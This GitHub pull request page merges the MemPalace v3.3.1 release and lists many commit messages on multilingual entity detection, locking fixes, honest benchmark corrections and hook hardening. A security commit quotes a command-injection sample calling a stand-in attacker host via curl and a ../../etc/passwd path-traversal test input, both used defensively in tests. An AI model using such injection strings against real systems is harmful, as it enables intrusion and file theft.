
release: v3.3.1 #957

Merged
igorls merged 83 commits into main from release/3.3.1
Apr 17, 2026

igorls commented Apr 16, 2026

Merges develop into main for the v3.3.1 release.

Version bumps

  • pyproject.toml → 3.3.1
  • mempalace/version.py → 3.3.1
  • README.md version badge → 3.3.1
  • uv.lock → 3.3.1

Changelog

Finalizes the previously-open [Unreleased] — v3.3.0 section (it was never closed out on the 3.3.0 release) by redating it to [3.3.0] — 2026-04-13, and adds a new [3.3.1] — 2026-04-16 section. Full entry is in CHANGELOG.md — highlights:

Headline: multi-language entity detection

Other notable changes

Post-merge checklist

  • Tag v3.3.1 on the squash-merge commit on main (mirrors how v3.3.0 was tagged on 4aa7e1e)
  • Draft GitHub Release referencing the 3.3.1 CHANGELOG section
  • Sync main → develop afterwards so the [3.3.0] → 2026-04-13 rename is also on develop

Test plan

  • Full suite: uv run python -m pytest tests/ --ignore=tests/benchmarks -q → 959 passed
  • Version consistency + README claim tests pass (44 passed)
  • Lint: uv run ruff check . clean
  • Format: ruff format --check clean on changed files
  • pre-commit hooks (ruff + ruff-format) pass

tejasashinde and others added 30 commits April 13, 2026 14:09
…etic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: #809
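
For readers following the hooks_cli.py change, here is a minimal sketch of the kind of check described above. It is not the project's actual `_validate_transcript_path()`: the function name, the boolean return type, and the backslash normalisation are assumptions made for illustration. Only the two rules (no `..` components, `.jsonl`/`.json` extensions only) come from the commit message.

```python
from pathlib import PurePath

# Extensions named in the commit message.
ALLOWED_SUFFIXES = {".jsonl", ".json"}


def validate_transcript_path(raw: str) -> bool:
    """Hypothetical validator: True only for a non-empty path with no '..'
    component and an allowed extension."""
    if not raw:
        return False
    # Treat backslashes as separators so Windows-style paths are split the
    # same way on every platform (an assumption, not the project's code).
    parts = raw.replace("\\", "/").split("/")
    if ".." in parts:
        return False
    return PurePath(parts[-1]).suffix.lower() in ALLOWED_SUFFIXES
```

A caller in the spirit of `_count_human_messages()` would return 0 when this check fails rather than opening the file.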
…h test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: #809
Noticed a URL 
```
hXXps://www.mempalace[.]tech/
```

Although the README already warns about this domain, the warning is probably best surfaced prominently at the top of the README.
sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
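
A rough sketch of the strict/permissive split described above. The commit message does not state the exact rules, so the character class, the length cap, and the control-character check below are all assumptions; only the two function names and the idea that KG values may contain commas, colons, parentheses, and slashes come from the source.

```python
import re

# Assumed strict pattern for wing/room names and predicates.
_NAME_RE = re.compile(r"[A-Za-z0-9_ .'-]+")


def sanitize_name(value: str) -> str:
    """Strict check: rejects punctuation such as commas, colons, parentheses, slashes."""
    value = value.strip()
    if not value or not _NAME_RE.fullmatch(value):
        raise ValueError(f"invalid name: {value!r}")
    return value


def sanitize_kg_value(value: str, max_len: int = 256) -> str:
    """Permissive check for KG subject/object/entity values.

    Allows ordinary punctuation; rejects only empty, over-long, or
    control-character input (assumed rules, for illustration).
    """
    value = value.strip()
    if not value or len(value) > max_len:
        raise ValueError("KG value is empty or too long")
    if any(ord(ch) < 32 for ch in value):
        raise ValueError("KG value contains control characters")
    return value
```

With this split, a value like `Paris, France (capital)` passes `sanitize_kg_value` but is still rejected by `sanitize_name`.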
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.
Addresses review feedback on #604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.
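
The fallback and the stderr warning from the two commits above could look roughly like this. It is a sketch under assumptions: the function name, the returned dictionary shape, and the warning text are hypothetical, and YAML parsing is left out to keep the example dependency-free.

```python
import sys
from pathlib import Path

# File names taken from the commit message.
CONFIG_NAMES = ("mempalace.yaml", "mempal.yaml")


def resolve_config(source_dir: str) -> dict:
    """Return a config for source_dir, falling back to defaults instead of exiting."""
    root = Path(source_dir).resolve()
    found = next((root / n for n in CONFIG_NAMES if (root / n).is_file()), None)
    if found is not None:
        # Real code would parse the YAML file here.
        return {"source": str(found)}
    # Warn on stderr so piped stdout (mine progress output) stays clean.
    print(
        f"warning: no mempalace.yaml in {root}; using wing '{root.name}'. "
        "Directories with the same basename will share a wing; "
        "add a mempalace.yaml to disambiguate.",
        file=sys.stderr,
    )
    return {"source": None, "wing": root.name, "room": "general"}
```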
fix: allow mining directories without local mempalace.yaml
fix: harden hooks against shell injection, path traversal, and arithmetic injection
Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in #877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.
Increase visibility of fake website caution
…ation

fix: use permissive validator for KG entity values
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <[email protected]>
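
For context, the pattern behind this change is simply hoisting `re.compile` out of the hot path. The sketch below uses a made-up pattern and function name; it is not the code in `dialect.py`.

```python
import re

# Compiled once at import time. The pattern itself is illustrative only.
_CAPITALIZED_RE = re.compile(r"[A-Z][a-z]{2,}")


def extract_capitalized(lines):
    """Collect capitalized words from every line using the precompiled pattern."""
    found = []
    for line in lines:
        # No re.compile() call inside the loop.
        found.extend(_CAPITALIZED_RE.findall(line))
    return found
```

Python's `re` module keeps an internal cache of compiled patterns, so the saving is mostly the per-iteration cache lookup and argument handling; it still makes the pattern easier to find and reuse.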
export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>
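
A minimal sketch of how the toggle might be read on the Python side. Only the variable name `MEMPAL_VERBOSE` and its `true`/`false` values come from the commit message; the helper name and the case-insensitive comparison are assumptions.

```python
import os


def verbose_enabled(env=None) -> bool:
    """True when MEMPAL_VERBOSE is set to 'true'; the default is silent mode."""
    env = os.environ if env is None else env
    return env.get("MEMPAL_VERBOSE", "false").strip().lower() == "true"
```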
Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.
…n-15578943484596502942

⚡ Optimize regex compilation in entity extraction
feat: add VSCode devcontainer matching CI environment
Closes #872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
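
The rule in this commit can be sketched as a small helper: emit `"decision": "block"` only when blocking, and an empty JSON object otherwise. The helper name and the `reason` field are assumptions for illustration; the commit message only confirms the `block` value and the `{}` fallback.

```python
import json


def hook_response(should_block: bool, reason: str = "") -> str:
    """Build the JSON a hook prints to stdout."""
    if should_block:
        return json.dumps({"decision": "block", "reason": reason})
    # Never emit "decision": "allow"; an empty object means "do not block".
    return json.dumps({})
```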
fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph
fix: replace invalid 'decision: allow' with {} in hooks (closes #872)
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
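
To illustrate the locking rule these two fixes enforce (every method that touches `self._connection` holds `self._lock`, including `close()`), here is a self-contained toy class. It is not the project's `KnowledgeGraph`; the class name, the table layout, and the use of sqlite3 are assumptions.

```python
import sqlite3
import threading


class TinyGraph:
    """Toy stand-in showing one lock guarding every use of the connection."""

    def __init__(self, path=":memory:"):
        self._lock = threading.Lock()
        self._connection = sqlite3.connect(path, check_same_thread=False)
        with self._lock:
            self._connection.execute(
                "CREATE TABLE IF NOT EXISTS triples (s TEXT, p TEXT, o TEXT)"
            )

    def add(self, s, p, o):
        with self._lock:
            self._connection.execute("INSERT INTO triples VALUES (?, ?, ?)", (s, p, o))
            self._connection.commit()

    def stats(self):
        with self._lock:
            (count,) = self._connection.execute("SELECT COUNT(*) FROM triples").fetchone()
            return {"triples": count}

    def close(self):
        # close() takes the same lock, so it cannot run while a query is in flight.
        with self._lock:
            if self._connection is not None:
                self._connection.close()
                self._connection = None
```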
fix: add lock to KG close() — last missing lock (closes #883)
The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models
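
The two parsing rules in the list above (take the last integer, fall back to `message.reasoning` when `content` is empty) can be sketched as follows. The function name, the dictionary shape, and the 1-based range check are assumptions, not the benchmark scripts' actual code.

```python
import re

_INT_RE = re.compile(r"\d+")


def pick_index(message: dict, n_candidates: int):
    """Return the model's chosen candidate number, or None if none can be parsed."""
    # Reasoning models may leave content empty and put the answer in `reasoning`.
    text = message.get("content") or message.get("reasoning") or ""
    numbers = _INT_RE.findall(text)
    if not numbers:
        return None
    # Reasoning output often mentions several numbers; the last one is the answer.
    choice = int(numbers[-1])
    # Assumes candidates are numbered from 1.
    return choice if 1 <= choice <= n_candidates else None
```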
Addresses #875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.
Addresses #875. The previous README was 755 lines mixing six purposes
(scam alert, hero, two mea-culpa notes, install guide, architecture
explainer, API reference, file map). Rework it as a pure entry point:
what MemPalace is, how to install, honest benchmark numbers, links to
the website for concept/architecture documentation.

Key content changes:
 - Drop the "highest-scoring AI memory system ever benchmarked" framing.
 - New tagline: "Local-first AI memory. Verbatim storage, pluggable
   backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids
   naming a specific vector-store implementation since the backend is
   pluggable (see mempalace/backends/base.py).
 - Remove the cross-system comparison table. Retrieval recall (R@5)
   and end-to-end QA accuracy are different metrics and are not
   comparable; placing MemPalace's R@5 next to competitor QA accuracy
   under a single column header was a category error.
 - The "100%" LongMemEval headline is no longer the lead. The honest
   held-out figure is 98.4% R@5 on 450 unseen questions. The rerank
   pipeline reaches >=99% with any capable LLM (reproduced with
   Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level,
   not model-specific.
 - Benchmark reproduction commands now reference the correct repo
   (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch).

New file: docs/HISTORY.md as the canonical home for post-launch
corrections, public notices, and retractions. Contains verbatim:
 - 2026-04-14 note on this rewrite (links to #875)
 - 2026-04-11 impostor-domain notice (moved from README header)
 - 2026-04-07 "A Note from Milla & Ben" (moved from README body)

README keeps a one-line scam-alert callout that links to
docs/HISTORY.md for the full timeline.
Part of #875. Bring the VitePress site into line with the new README
and the reproducibility scorecard: drop category-error comparisons,
drop retracted claims, retain only metrics and caveats that survive
audit.

website/index.md
 - New tagline matches README (local-first, verbatim, pluggable backend,
   96.6% R@5 raw, zero API calls).
 - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra
   94.87% / Mem0 ~85%" comparison table with a single honest table
   showing MemPalace's own retrieval-recall numbers (raw 96.6%,
   hybrid v4 held-out 98.4%). Add an explicit sentence explaining why
   we no longer publish a cross-system table on the landing page
   (retrieval recall vs QA accuracy are different metrics).
 - Soften the "ChromaDB-powered vector search" feature blurb to be
   backend-agnostic, since the retrieval layer is pluggable.

website/reference/benchmarks.md
 - Full rewrite of the retrieval-recall tables. No more "100%"
   headline; honest held-out 98.4% R@5 replaces it. Added the
   model-agnostic rerank result (99.2% R@5 / 100% R@10 with
   minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
 - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row.
   With per-conversation session counts of 19-32 and top_k=50, the
   retrieval stage returns every session by construction — the number
   measures an LLM's reading comprehension, not retrieval.
 - Drop the cross-system comparison tables. Link out to each project's
   own research page (Mastra, Mem0, Supermemory) for their published
   numbers and metric definitions.
 - Rewrite reproduction commands to use the correct repository and
   demonstrate the new --llm-backend ollama flag.

website/concepts/the-palace.md
 - Remove the "+34%" row / paragraph. Wing/room filtering is standard
   metadata filtering in the vector store, not a novel retrieval
   mechanism — the April-7 note already retracted that framing; this
   finishes the retraction on the website where it had remained.

website/guide/searching.md
 - Same treatment for "34% retrieval improvement". Reframe as
   operational scoping, not a novel boost.

website/reference/contributing.md
 - Update the "palace structure matters" bullet to reflect the same
   framing: scoping-not-magic.

website/concepts/knowledge-graph.md
 - Replace the MemPalace-vs-Zep feature matrix with a short "related
   work" note that links to Zep's own documentation for authoritative
   details on their deployment model. Avoids claims we cannot verify
   at source.
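
The reason for dropping the LoCoMo top-50 row can be shown with a toy metric. The sketch assumes a hit-rate style session recall (1.0 if any gold session is among the top_k retrieved); the benchmark's exact metric definition may differ, and the function name is hypothetical.

```python
def session_hit(ranked_session_ids, gold_session_ids, top_k):
    """1.0 if any gold session appears in the top_k retrieved sessions, else 0.0."""
    retrieved = set(ranked_session_ids[:top_k])
    return 1.0 if retrieved & set(gold_session_ids) else 0.0


# A conversation with 32 sessions, ranked in the worst possible order
# for a question whose evidence lives in session 0.
worst_ranking = list(range(32))[::-1]
score_top50 = session_hit(worst_ranking, [0], top_k=50)
score_top10 = session_hit(worst_ranking, [0], top_k=10)
```

With at most 32 sessions, `top_k=50` returns every session regardless of ranking quality, so even the worst ranking scores a hit; at `top_k=10` the same ranking misses.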
Remaining in-repo surfaces carrying the same retracted or broken
claims as the public pages fixed in the previous two commits.

CONTRIBUTING.md
 - "Palace structure matters ... 34% retrieval improvement" → reframed
   as scoping (same rewording applied to the website equivalents).

benchmarks/BENCHMARKS.md
 - Add a prominent "Important caveat" block at the top of the
   "Comparison vs Published Systems" table explaining that R@5
   (retrieval recall) and QA accuracy are different metrics, with
   citations to Mastra, Mem0, and Supermemory's own published
   methodology pages. Annotate the specific competitor rows whose
   numbers are QA accuracy, not retrieval recall.
 - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4
   → 100 step was tuned on 3 specific wrong answers (already disclosed
   further down in the doc under "Benchmark Integrity"); the honest
   hybrid figure is held-out 98.4%.
 - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points
   at anything; now `MemPalace/mempalace`.

benchmarks/README.md + benchmarks/HYBRID_MODE.md
 - Same clone-URL fix applied.

CHANGELOG.md
 - Add a ### Documentation entry under [Unreleased] v3.3.0 that names
   #875 and summarises the scope of the rewrite.
tejasashinde and others added 23 commits April 15, 2026 23:33
…_patterns,direct_address_pattern, project_verb_patterns and stopwords
…oses #117)

CLI strings, AAAK instruction, regex patterns, and entity section
with person-verb, pronoun, dialogue, and candidate patterns for
Latin+diacritics names (Joao, Ines, Angela).

Follows the i18n entity framework from #911.
- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)
feat: add Brazilian Portuguese support to entity_detector (closes #117)
BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.

Closes #927
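
A minimal sketch of the case-insensitive resolution described above. The real `_canonical_lang` discovers the available stems from the locale directory; here they are passed in as a list, and the fall-through behaviour for unknown codes is an assumption.

```python
from typing import Sequence


def canonical_lang(lang: str, available: Sequence[str]) -> str:
    """Map any casing of a language tag to the on-disk filename stem."""
    wanted = lang.lower()
    for stem in available:
        if stem.lower() == wanted:
            return stem
    # Unknown tag: return it unchanged and let the caller decide what to do.
    return lang


STEMS = ["en", "pt-br", "zh-CN"]  # mixed conventions, as in the locale files
```

Routing the cache key through the same function means `PT-BR` and `pt-br` share one cache entry.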
PEP 604 union syntax (str | None) requires Python 3.10+. The project
supports 3.9 per CI matrix, so use typing.Optional instead.
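
For reference, the 3.9-compatible spelling looks like this. The function name and the `"en"` default are hypothetical; the point is only the annotation style.

```python
from typing import Optional


# `lang: str | None = None` raises TypeError at definition time on Python 3.9
# (unless annotations are deferred), so Optional[str] is used instead.
def resolve_lang(lang: Optional[str] = None) -> str:
    return lang or "en"
```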
… scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.

Changes:
- mempalace/i18n/__init__.py: add _script_boundary, _expand_b,
  _wrap_candidate, _collect_entity_section; candidate_patterns are now
  returned fully-wrapped (boundary + capture group applied)
- mempalace/entity_detector.py: extract_candidates compiles pre-wrapped
  candidate patterns directly instead of re-wrapping with \b
- tests/test_entity_detector.py: 5 new tests for Devanagari boundaries
  (name extraction with/without boundary_chars, person-verb firing,
  English regression)
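
The boundary substitution can be sketched as below. This is an illustration of the technique, not the code in `mempalace/i18n/__init__.py`: the function names drop the leading underscore, the lookaround construction is one plausible way to build a script-aware boundary, and `NAME_PATTERN` is a made-up pattern. The `boundary_chars` value is the one quoted in the commit message.

```python
import re


def script_boundary(boundary_chars: str) -> str:
    """Build a zero-width boundary that treats boundary_chars as inside-word."""
    inside = f"[{boundary_chars}]"
    # Word start (outside then inside) or word end (inside then outside).
    return f"(?:(?<!{inside})(?={inside})|(?<={inside})(?!{inside}))"


def expand_b(pattern: str, boundary_chars: str) -> str:
    """Swap every \\b in pattern for the script-aware boundary."""
    # Naive text replacement: it would also rewrite an escaped backslash
    # that happens to be followed by "b".
    return pattern.replace(r"\b", script_boundary(boundary_chars))


HINDI_BOUNDARY = r"\w\u0900-\u097F"     # value quoted in the commit message
NAME_PATTERN = r"\b[\u0900-\u097F]+\b"  # illustrative pattern only
```

Matching `NAME_PATTERN` as written against a name ending in a matra stops one character short, because the plain `\b` cannot fire after the final combining mark; `expand_b(NAME_PATTERN, HINDI_BOUNDARY)` matches the whole name, and Latin-script patterns behave as before.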
…boundaries

fix(entity_detector): script-aware word boundaries for combining-mark scripts
…alace

entity_detector.py was refactored in #911 to load candidate patterns
from i18n locale JSON files, supporting non-Latin scripts (Cyrillic,
accented Latin, etc.). But three other code paths still hardcoded the
ASCII-only regex [A-Z][a-z]{2,}, silently missing non-Latin entity
names in metadata tagging, closet indexing, and registry lookups.

Replace the hardcoded regex with a shared _candidate_entity_words()
helper that reuses the same i18n candidate_patterns as entity_detector.
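
A sketch of what a shared helper along these lines might look like. The real `_candidate_entity_words()` pulls its patterns from the i18n locale files; here two illustrative patterns are passed in directly, and the order-preserving de-duplication is an assumption.

```python
import re

# Illustrative patterns only; the locale JSON files define the real ones.
EN_PATTERN = r"\b[A-Z][a-z]{2,}\b"
# Cyrillic capital (U+0410-U+042F, U+0401) followed by two or more lowercase letters.
RU_PATTERN = r"\b[\u0410-\u042F\u0401][\u0430-\u044F\u0451]{2,}\b"


def candidate_entity_words(text, patterns):
    """Return candidate entity words matched by any pattern, in first-seen order."""
    seen = []
    for pattern in patterns:
        for match in re.finditer(pattern, text):
            word = match.group(0)
            if word not in seen:
                seen.append(word)
    return seen
```

With only the ASCII pattern, a Cyrillic name in the text is silently skipped; passing both patterns picks it up.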
Introduces the Indonesian (id) locale, providing translations for CLI commands, status messages, and core terminology.

Includes language-specific regex patterns for stop words and action detection to support text processing and indexing in Indonesian. The test suite is updated with a sample case to verify correct dialect handling and compression.
Refine AAAK instruction and expand entity detection patterns.
On Windows with non-UTF-8 locale (e.g. GBK), Path.read_text() defaults
to platform encoding, breaking onboarding tests and any source code that
reads JSON/markdown with non-ASCII content.

5 files, 8 call sites fixed.
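
The fix pattern is a one-argument change at each call site. A minimal sketch, with a hypothetical helper name:

```python
import json
from pathlib import Path


def read_json(path):
    """Read a JSON file as UTF-8 regardless of the platform's default encoding."""
    # Without encoding=..., read_text() uses the locale encoding (e.g. GBK on
    # some Windows setups) and can fail or mis-decode non-ASCII content.
    return json.loads(Path(path).read_text(encoding="utf-8"))
```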
feat: add Hindi language support to i18n module
feat: add Indonesian language support
fix(i18n): resolve language codes case-insensitively (#927)
fix: add explicit UTF-8 encoding to read_text() calls (#776)
fix: use i18n candidate patterns for entity extraction in miner and palace
Bumps version across pyproject.toml, mempalace/version.py, README badge,
and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled
'Unreleased') and adds a 3.3.1 section covering the multi-language
entity-detection infra and the five new locales landed since 2026-04-13.

Highlights:
- Multi-language entity detection infra (#911) + script-aware word
  boundaries for combining-mark scripts (#932) + BCP 47 case-insensitive
  locale resolution (#928) + i18n patterns wired into miner/palace/
  entity_registry (#931)
- Five new fully-supported locales: pt-br (#156), ru (#760), it (#907),
  hi (#773), id (#778)
- UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales
  (#946)
- KnowledgeGraph lock correctness (#884, #887)
- Various smaller fixes and improvements
Advisor caught: initial boundary (962776c..develop) skipped PRs that
landed on develop after v3.3.0 tag but before the sync-back merge.
Adds entries for #871 MEMPAL_VERBOSE, #811 research() local-only
default, #866 init .gitignore, #864 MCP stdout redirect, #863
precompact hook, #865 searcher empty results, #831 cold-start palace,
#862 init help, #815 Slack provenance, #840 save hook auto-mine.
Also drops the awkward caveat on #846 created_at — it's post-v3.3.0.
The version-guard workflow checks that five sources agree:
mempalace/version.py, pyproject.toml, .claude-plugin/marketplace.json,
.claude-plugin/plugin.json, .codex-plugin/plugin.json.

Initial release commit missed the three plugin manifests.
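
The agreement check can be sketched as a comparison against one reference source. This is not the workflow's actual implementation; the function name is hypothetical, the version strings are example values, and extracting the version from each file is left out.

```python
def mismatched_sources(versions: dict, reference: str = "mempalace/version.py") -> list:
    """Return the sources whose version differs from the reference, sorted by name."""
    expected = versions[reference]
    return sorted(name for name, version in versions.items() if version != expected)


# Example values only: the state after a release commit that bumped
# two sources but missed the three plugin manifests.
example = {
    "mempalace/version.py": "3.3.1",
    "pyproject.toml": "3.3.1",
    ".claude-plugin/marketplace.json": "3.3.0",
    ".claude-plugin/plugin.json": "3.3.0",
    ".codex-plugin/plugin.json": "3.3.0",
}
stale = mismatched_sources(example)
```

An empty list means all five sources agree; anything else names the files that still need a bump.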
…ests

release: bump plugin manifests to 3.3.1
@igorls igorls merged commit 6889c6f into main Apr 17, 2026
7 checks passed